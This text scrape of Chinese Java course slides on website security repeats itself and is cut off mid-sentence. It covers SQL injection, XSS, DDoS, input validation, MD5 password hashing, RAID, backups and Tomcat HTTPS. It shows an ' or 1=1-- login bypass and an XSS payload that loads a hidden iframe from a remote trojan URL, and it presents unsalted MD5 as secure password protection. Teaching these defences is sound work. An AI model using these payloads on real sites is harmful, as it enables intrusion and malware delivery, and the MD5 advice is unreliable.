安全優化第十章安全優化第十章回顧與作業點評Spring如何與Struts2集成？Spring如何與Hibernate集成？為什么使用Web服務？使用JQuery的好處？回顧與作業點評Spring如何與Struts2集成？預習檢查DDoS攻擊的主要攻擊方式包括？對表單輸入的數據應該作哪些驗證？防止SQL注入有哪些方法？在IIS上配置https協議有哪些主要的步驟？預習檢查DDoS攻擊的主要攻擊方式包括？本章任務使用MD5加密密碼字段防止SQL注入防范XSS攻擊配置數據庫備份配置Tomcat支持HTTPS協議本章任務使用MD5加密密碼字段本章目標網站面臨的安全風險安全優化方案強化程序安全強化數據安全本章目標網站面臨的安全風險網站面臨的安全風險SQL注入網絡監聽字典攻擊系統漏洞掃描DDoS攻擊知己知彼，百戰不殆，使用常見的網絡攻擊方法是了解網站是否安全的途徑網站面臨的安全風險SQL注入知己知彼，百戰不殆，使用常見的網SQL注入SQL注入是通過修改URL參數或提交特殊的表單信息等方式將惡意的SQL命令注入到后臺數據庫引擎執行的能力SQL注入SQL注入是通過修改URL參數或提交特殊的表單信息SQL注入通過“用戶登錄”功能注入StringSql="selectID,[Name],PhonefromUserswhereusername='"+username+"'andpassword='"+password+"'"StringSql="selectID,[Name],PhonefromUserswhereusername=''or1=1--andLoginPwd="username

為'or1=1--

password為空SQL注入通過“用戶登錄”功能注入StringSql="s網絡監聽利用網絡監聽可以攔截網絡傳輸過程中的數據網絡監聽利用網絡監聽可以攔截網絡傳輸過程中的數據字典攻擊字典攻擊也叫暴力破解，其原理就是將可能包含有字符串的多個密碼組合，逐個驗證字典攻擊字典攻擊也叫暴力破解，其原理就是將可能包含有字符串的系統漏洞掃描利用服務器漏洞也是網站遭受攻擊常見的攻擊方式IIS漏洞應用軟件的漏洞……利用服務器漏洞掃描軟件X-Scan發現系統漏洞配置掃描參數開始掃描，根據設置的IP范圍和掃描模塊逐項掃描掃描結束，得到掃描報告，分析掃描報告，查看掃描報告中提示的安全漏洞解決方案系統漏洞掃描利用服務器漏洞也是網站遭受攻擊常見的攻擊方式系統漏洞掃描X-Scan系統漏洞檢測報告掃描時間檢測結果主機列表主機分析安全漏洞及解決方案系統漏洞掃描X-Scan系統漏洞檢測報告DDoS攻擊DDoS攻擊也叫拒絕服務式攻擊，它是利用合理的服務請求來占用過多的服務器資源，從而讓服務器無法正常提供服務DDoS攻擊DDoS攻擊也叫拒絕服務式攻擊，它是利用合理的服DDoS攻擊DDoS攻擊主要的兩種攻擊方式流量攻擊，致使正常的網絡請求的數據包無法達到主機資源耗盡攻擊，導致主機的內存、CPU被耗盡而無法提供服務從理論上講DDoS攻擊是不可避免的服務器遭遇DDoS攻擊的常見現象大量等待處理的TCP連接大量的無用的數據包，源地址為假突然增加的大量的訪問請求，造成網絡堵塞大量占用資源較多的訪問請求造成服務器過載，甚至死機DDoS攻擊DDoS攻擊主要的兩種攻擊方式網站安全優化方案保障網站物理安全強化網站程序安全強化網站數據安全強化網站服務器安全網站安全優化方案保障網站物理安全共性問題講解常見調試問題及解決辦法代碼規范問題共性問題集中講解共性問題講解常見調試問題及解決辦法共性問題集中講解強化程序安全－控制輸入程序對獲取的數據缺乏校驗是網站被攻擊的原因之一例如利用URL傳遞參數http://localhost/BookDetail.aspx?bid=4943控制輸入就是在驗證數據的有效性、完整性之后，實現數據的安全性輸入包括：用戶輸入的表單數據和應用程序的往返數據

如：ViewState、Cookie、查詢字符串參數等強化程序安全－控制輸入程序對獲取的數據缺乏校驗是網站被攻擊的強化程序安全－控制輸入驗證輸入表單數據包括：驗證必填項不為空驗證數據的類型：如手機，必須是數字組合驗證數據的長度：如用戶名、密碼，必須是4~20位驗證數據的有效性：如Email，必須含“@”符號保證URL輸入參數有效使用系統類型轉換函數ToNumber()、ToValidId()、ToInt()等強化程序安全－控制輸入驗證輸入表單數據包括：強化程序安全－防止SQL注入防止SQL注入的方法對于拼接的SQL語句要過濾SQL關鍵字對于數據庫類型的查詢參數，最好使用系統類型轉換函數進行強制轉換使用參數化查詢參數化查詢是最有效防止SQL注入的方法stringsql="SELECT*FROMBooksWHEREId=@Id";SqlDataReaderreader=DBHelper.GetReader(sql,

newSqlParameter("@Id",id));強化程序安全－防止SQL注入防止SQL注入的方法st強化程序安全－保護關鍵數據關鍵數據一般是指對網站系統能產生重大影響的數據管理員賬號和密碼用戶賬號和密碼信用卡的卡號和密碼用戶的隱私信息……使用MD5加密使用MD5加密管理員密碼和用戶密碼修改管理員和用戶登錄代碼，使用MD5驗證密碼MD5是一種廣泛使用的加密算法，具備不可逆性強化程序安全－保護關鍵數據關鍵數據一般是指對網站系統能產生重練習——使用MD5加密登錄密碼需求說明添加用戶信息，使用MD5加密用戶密碼；用戶登錄，驗證登錄是否成功實現思路添加用戶，輸入用戶名和密碼信息，使用MD5加密用戶密碼用戶登錄，分別輸入正確、錯誤的密碼，驗證登錄是否成功完成時間：15分鐘練習——使用MD5加密登錄密碼需求說明完成時間：15分鐘共性問題集中講解常見調試問題及解決辦法代碼規范問題共性問題集中講解共性問題集中講解常見調試問題及解決辦法共性問題集中講解詳細的錯誤頁面提示導致信息泄露強化程序安全－模糊錯誤提示發生錯誤或者異常時，返回自定義錯誤信息給用戶模糊的錯誤提示比如不論用戶名錯誤、密碼錯誤或認證碼錯誤，統一提示“登錄信息錯誤，請重新登錄”<error><exception-type>java.lang.NullPointerException</exception-type><location>/error.jsp</location></error>配置web.config自定義錯誤頁面

詳細的錯誤頁面提示導致信息泄露強化程序安全－模糊錯誤提示發生強化程序安全－記錄系統日志記錄系統日志記錄的信息包括管理員登錄信息管理員所有操作信息會員購物信息程序錯誤和異常信息……日志要真實，只能查看，不能修改和刪除強化程序安全－記錄系統日志記錄系統日志強化程序安全－防止跨站腳本攻擊跨站腳本攻擊(XSS)指攻擊者利用網站程序對用戶輸入過濾不足，輸入可以顯示在頁面上對其他用戶造成影響的HTML代碼……案例：

QQ郵箱中的掛馬漏洞跨站腳本攻擊的兩種方式調用遠程文件，一般使用iframe實現讀取本地用戶隱私文件（如Cookie），然后將用戶隱私文件上傳到遠程服務器<imgsrc="javascript:document.write('<iframesrc=http://***.com/muma.aspwidth=0height=0border=0></iframe>')"width=1height=1>調用遠程木馬的URL地址強化程序安全－防止跨站腳本攻擊跨站腳本攻擊(XSS)<img強化程序安全－防止跨站腳本攻擊防止跨站腳本攻擊的方式為所有的iframe增加Security屬性，設置值為restricted設置Cookie的HttpOnly屬性，可有效防止Cookie通過腳本泄密構造過濾XSS的方法FilterXSS()過濾標簽xml、link、style、embed、iframe、frame等過濾DOM事件（比如onload）、Style中的expression等強化程序安全－防止跨站腳本攻擊防止跨站腳本攻擊的方式強化數據安全—服務器磁盤陣列使用RAID磁盤陣列可以有效的防止因硬盤損壞導致數據的丟失RAID是是獨立冗余磁盤陣列。它不是一個磁盤，而是一組磁盤，利用冗余的磁盤來處理數據RAID類型RAID0RAID1RAID10……強化數據安全—服務器磁盤陣列使用RAID磁盤陣列可以有效強化數據安全—服務器磁盤陣列RAID0不具有冗余，并行I/O，速度最快RAID1速度沒有提高，可靠性最高RAID5一種存儲性能、數據安全和存儲成本兼顧的方案強化數據安全—服務器磁盤陣列RAID0強化數據安全—服務器磁盤陣列RAID10RAID01是先條帶化再鏡像，RAID10是先鏡像再條帶化性能和安全性均高于RAID5，但是磁盤利用率低于RAID5強化數據安全—服務器磁盤陣列RAID10強化數據安全—備份網站和數據庫備份網站的程序文件防止網站出現各種意外情況，如服務器零件損壞、斷線或者被黑客攻擊等能及時恢復“綠環FTP數據備份”，是一款專門用于FTP數據備份的綠色軟件，并且還是免費版本，解壓后無須安裝即可使用強化數據安全—備份網站和數據庫備份網站的程序文件強化數據安全—備份網站和數據庫網站數據庫的備份以Oracle10g為例通過批處理文件+任務計劃的形式實現setbackfile=d:\bak\%date:~0,4%%date:~5,2%%date:~8,2%expjbit/bdqn@orclfile=%backfile%.dmplog=%backfile%.lograra%backfile%.rar%backfile%.dmp%backfile%.logdel%backfile%.dmpdel%backfile%.log強化數據安全—備份網站和數據庫網站數據庫的備份setbac練習——備份網站程序和數據需求說明使用“綠環FTP數據備份”備份網站程序文件通過批處理文件+任務計劃的形式實現網站數據庫文件的每日的自動備份實現思路參考學生用書部分完成時間：15分鐘練習——備份網站程序和數據需求說明完成時間：15分鐘強化數據安全——配置HTTPS協議配置Tomcat支持HTTPS協議的步驟：使用JAVA_HOME/bin目錄下keytool命令生成數字證書配置Tomcat目錄下的server.xml文件重啟Tomcat強制客戶端采用HTTPS訪問，修改tomcat\conf\web.xml<Connectorport="8443"protocol="HTTP/1.1"SSLEnabled="true" maxThreads="150"scheme="https"secure="true" clientAuth="false"sslProtocol="TLS" keystoreFile="C:\Tomcat\GMAE3.0Tomcat\tomcat.keystore" keystorePass="tomcat"/>指定證書位置證書密碼<login-config><auth-method>CLIENT-CERT</auth-method><realm-name>ClientCertUsers-onlyArea</realm-name></login-config><security-constraint><web-resource-collection><web-resource-name>SSL</web-resource-name><url-pattern>/*</url-pattern></web-resource-collection><user-data-constraint><transport-guarantee>CONFIDENTIAL</transport-guarantee></user-data-constraint></security-constraint>強化數據安全——配置HTTPS協議配置Tomcat支持HTT練習——配置HTTPS協議需求說明配置Tomcat支持HTTPS協議，強制客戶端采用HTTPS訪問實現思路使用keytool命令生成數字證書修改server.xml文件中關于SSL的相關段重啟Tomcat，嘗試使用HTTPS和HTTP訪問程序強制客戶端采用HTTPS訪問重啟Tomcat，嘗試使用HTTPS和HTTP訪問程序完成時間：15分鐘練習——配置HTTPS協議需求說明完成時間：15分鐘共性問題集中講解常見調試問題及解決辦法代碼規范問題共性問題集中講解共性問題集中講解常見調試問題及解決辦法共性問題集中講解總結常用的網絡攻擊方式有哪些？網站安全優化方案有哪些？如何強化程序安全？如何強化數據安全？總結常用的網絡攻擊方式有哪些？作業課后作業必做教員備課時在此添加內容選做教員備課時在此添加內容提交時間：xxx提交形式：xxx預習作業背誦英文單詞教員備課時在此添加內容作業課后作業TP10安全優化ACCP60Y2JAVA3使用Java企業級技術開發大型系統課件安全優化第十章安全優化第十章回顧與作業點評Spring如何與Struts2集成？Spring如何與Hibernate集成？為什么使用Web服務？使用JQuery的好處？回顧與作業點評Spring如何與Struts2集成？預習檢查DDoS攻擊的主要攻擊方式包括？對表單輸入的數據應該作哪些驗證？防止SQL注入有哪些方法？在IIS上配置https協議有哪些主要的步驟？預習檢查DDoS攻擊的主要攻擊方式包括？本章任務使用MD5加密密碼字段防止SQL注入防范XSS攻擊配置數據庫備份配置Tomcat支持HTTPS協議本章任務使用MD5加密密碼字段本章目標網站面臨的安全風險安全優化方案強化程序安全強化數據安全本章目標網站面臨的安全風險網站面臨的安全風險SQL注入網絡監聽字典攻擊系統漏洞掃描DDoS攻擊知己知彼，百戰不殆，使用常見的網絡攻擊方法是了解網站是否安全的途徑網站面臨的安全風險SQL注入知己知彼，百戰不殆，使用常見的網SQL注入SQL注入是通過修改URL參數或提交特殊的表單信息等方式將惡意的SQL命令注入到后臺數據庫引擎執行的能力SQL注入SQL注入是通過修改URL參數或提交特殊的表單信息SQL注入通過“用戶登錄”功能注入StringSql="selectID,[Name],PhonefromUserswhereusername='"+username+"'andpassword='"+password+"'"StringSql="selectID,[Name],PhonefromUserswhereusername=''or1=1--andLoginPwd="username

為'or1=1--

password為空SQL注入通過“用戶登錄”功能注入StringSql="s網絡監聽利用網絡監聽可以攔截網絡傳輸過程中的數據網絡監聽利用網絡監聽可以攔截網絡傳輸過程中的數據字典攻擊字典攻擊也叫暴力破解，其原理就是將可能包含有字符串的多個密碼組合，逐個驗證字典攻擊字典攻擊也叫暴力破解，其原理就是將可能包含有字符串的系統漏洞掃描利用服務器漏洞也是網站遭受攻擊常見的攻擊方式IIS漏洞應用軟件的漏洞……利用服務器漏洞掃描軟件X-Scan發現系統漏洞配置掃描參數開始掃描，根據設置的IP范圍和掃描模塊逐項掃描掃描結束，得到掃描報告，分析掃描報告，查看掃描報告中提示的安全漏洞解決方案系統漏洞掃描利用服務器漏洞也是網站遭受攻擊常見的攻擊方式系統漏洞掃描X-Scan系統漏洞檢測報告掃描時間檢測結果主機列表主機分析安全漏洞及解決方案系統漏洞掃描X-Scan系統漏洞檢測報告DDoS攻擊DDoS攻擊也叫拒絕服務式攻擊，它是利用合理的服務請求來占用過多的服務器資源，從而讓服務器無法正常提供服務DDoS攻擊DDoS攻擊也叫拒絕服務式攻擊，它是利用合理的服DDoS攻擊DDoS攻擊主要的兩種攻擊方式流量攻擊，致使正常的網絡請求的數據包無法達到主機資源耗盡攻擊，導致主機的內存、CPU被耗盡而無法提供服務從理論上講DDoS攻擊是不可避免的服務器遭遇DDoS攻擊的常見現象大量等待處理的TCP連接大量的無用的數據包，源地址為假突然增加的大量的訪問請求，造成網絡堵塞大量占用資源較多的訪問請求造成服務器過載，甚至死機DDoS攻擊DDoS攻擊主要的兩種攻擊方式網站安全優化方案保障網站物理安全強化網站程序安全強化網站數據安全強化網站服務器安全網站安全優化方案保障網站物理安全共性問題講解常見調試問題及解決辦法代碼規范問題共性問題集中講解共性問題講解常見調試問題及解決辦法共性問題集中講解強化程序安全－控制輸入程序對獲取的數據缺乏校驗是網站被攻擊的原因之一例如利用URL傳遞參數http://localhost/BookDetail.aspx?bid=4943控制輸入就是在驗證數據的有效性、完整性之后，實現數據的安全性輸入包括：用戶輸入的表單數據和應用程序的往返數據

如：ViewState、Cookie、查詢字符串參數等強化程序安全－控制輸入程序對獲取的數據缺乏校驗是網站被攻擊的強化程序安全－控制輸入驗證輸入表單數據包括：驗證必填項不為空驗證數據的類型：如手機，必須是數字組合驗證數據的長度：如用戶名、密碼，必須是4~20位驗證數據的有效性：如Email，必須含“@”符號保證URL輸入參數有效使用系統類型轉換函數ToNumber()、ToValidId()、ToInt()等強化程序安全－控制輸入驗證輸入表單數據包括：強化程序安全－防止SQL注入防止SQL注入的方法對于拼接的SQL語句要過濾SQL關鍵字對于數據庫類型的查詢參數，最好使用系統類型轉換函數進行強制轉換使用參數化查詢參數化查詢是最有效防止SQL注入的方法stringsql="SELECT*FROMBooksWHEREId=@Id";SqlDataReaderreader=DBHelper.GetReader(sql,

newSqlParameter("@Id",id));強化程序安全－防止SQL注入防止SQL注入的方法st強化程序安全－保護關鍵數據關鍵數據一般是指對網站系統能產生重大影響的數據管理員賬號和密碼用戶賬號和密碼信用卡的卡號和密碼用戶的隱私信息……使用MD5加密使用MD5加密管理員密碼和用戶密碼修改管理員和用戶登錄代碼，使用MD5驗證密碼MD5是一種廣泛使用的加密算法，具備不可逆性強化程序安全－保護關鍵數據關鍵數據一般是指對網站系統能產生重練習——使用MD5加密登錄密碼需求說明添加用戶信息，使用MD5加密用戶密碼；用戶登錄，驗證登錄是否成功實現思路添加用戶，輸入用戶名和密碼信息，使用MD5加密用戶密碼用戶登錄，分別輸入正確、錯誤的密碼，驗證登錄是否成功完成時間：15分鐘練習——使用MD5加密登錄密碼需求說明完成時間：15分鐘共性問題集中講解常見調試問題及解決辦法代碼規范問題共性問題集中講解共性問題集中講解常見調試問題及解決辦法共性問題集中講解詳細的錯誤頁面提示導致信息泄露強化程序安全－模糊錯誤提示發生錯誤或者異常時，返回自定義錯誤信息給用戶模糊的錯誤提示比如不論用戶名錯誤、密碼錯誤或認證碼錯誤，統一提示“登錄信息錯誤，請重新登錄”<error><exception-type>java.lang.NullPointerException</exception-type><location>/error.jsp</location></error>配置web.config自定義錯誤頁面

詳細的錯誤頁面提示導致信息泄露強化程序安全－模糊錯誤提示發生強化程序安全－記錄系統日志記錄系統日志記錄的信息包括管理員登錄信息管理員所有操作信息會員購物信息程序錯誤和異常信息……日志要真實，只能查看，不能修改和刪除強化程序安全－記錄系統日志記錄系統日志強化程序安全－防止跨站腳本攻擊跨站腳本攻擊(XSS)指攻擊者利用網站程序對用戶輸入過濾不足，輸入可以顯示在頁面上對其他用戶造成影響的HTML代碼……案例：

QQ郵箱中的掛馬漏洞跨站腳本攻擊的兩種方式調用遠程文件，一般使用iframe實現讀取本地用戶隱私文件（如Cookie），然后將用戶隱私文件上傳到遠程服務器<imgsrc="javascript:document.write('<iframesrc=http://***.com/muma.aspwidth=0height=0border=0></iframe>')"width=1height=1>調用遠程木馬的URL地址強化程序安全－防止跨站腳本攻擊跨站腳本攻擊(XSS)<img強化程序安全－防止跨站腳本攻擊防止跨站腳本攻擊的方式為所有的iframe增加Security屬性，設置值為restricted設置Cookie的HttpOnly屬性，可有效防止Cookie通過腳本泄密構造過濾XSS的方法FilterXSS()過濾標簽xml、link、style、embed、iframe、frame等過濾DOM事件（比如onload）、Style中的expression等強化程序安全－防止跨站腳本攻擊防止跨站腳本攻擊的方式強化數據安全—服務器磁盤陣列使用RAID磁盤陣列可以有效的防止因硬盤損壞導致數據的丟失RAID是是獨立冗余磁盤陣列。它不是一個磁盤，而是一組磁盤，利用冗余的磁盤來處理數據RAID類型RAID0RAID1RAID10……強化數據安全—服務器磁盤陣列使用RAID磁盤陣列可以有效強化數據安全—服務器磁盤陣列RAID0不具有冗余，并行I/O，速度最快RAID1速度沒有提高，可靠性最高RAID5一種存儲性能、數據安全和存儲成本兼顧的方案強化數據安全—服務器磁盤陣列RAID0強化數據安全—服務器磁盤陣列RAID10RAID01是先條帶化再鏡像，RAID10是先鏡像再條帶化性能和安全性均高于RAID5，但是磁盤利用率低于RAID5強化數據安全—服務器磁盤陣列RAID10強化數據安全—備份網站和數據庫備份網站的程序文件防止網站出現各種意外情況，如服務器零件損壞、斷線或者被黑客攻擊等能及時恢復“綠環FTP數據備份”，是一款專門用于FTP數據備份的綠色軟件，并且還是免費版本，解壓后無須安裝即可使用強化數據安全—備份網站和數據庫備份網站的程序文件強化數據安全—備份網站和數據庫網站數據庫的備份以Oracle10g為例通過批處理文件+任務計劃的形式實現setbackfile=d:\bak\%date:~0,4%%date:~5,2%%date:~8,2%expjbit/bdqn@orclfile=%backfile%.dmplog=%backfile%.lograra%backfile%.rar%backfile%.dmp%backfile%.logdel%backfile%.dmpdel%backfile%.log強化數據安全—備份網站和數據庫網站數據庫的備份setbac練習——備份網站程序和數據需求說明使用“綠環FTP數據備份”備份網站程序文件通過批處理文件+任務計劃的形式實現網站數據庫文件的每日的自動備份實現思路參考學生用書部分完成時間：15分鐘練習——備份網站程序和數據需求說明完成時間：15分鐘強化數據安全——配置HTTPS協議配置Tomcat支持HTTPS協議的步驟：使用JAVA_HOME/bin目錄下keytool命令生成數字證書配置Tomcat目錄下的server.xml文件重啟Tomcat強制客戶端采用HTTPS訪問，修改tomcat\con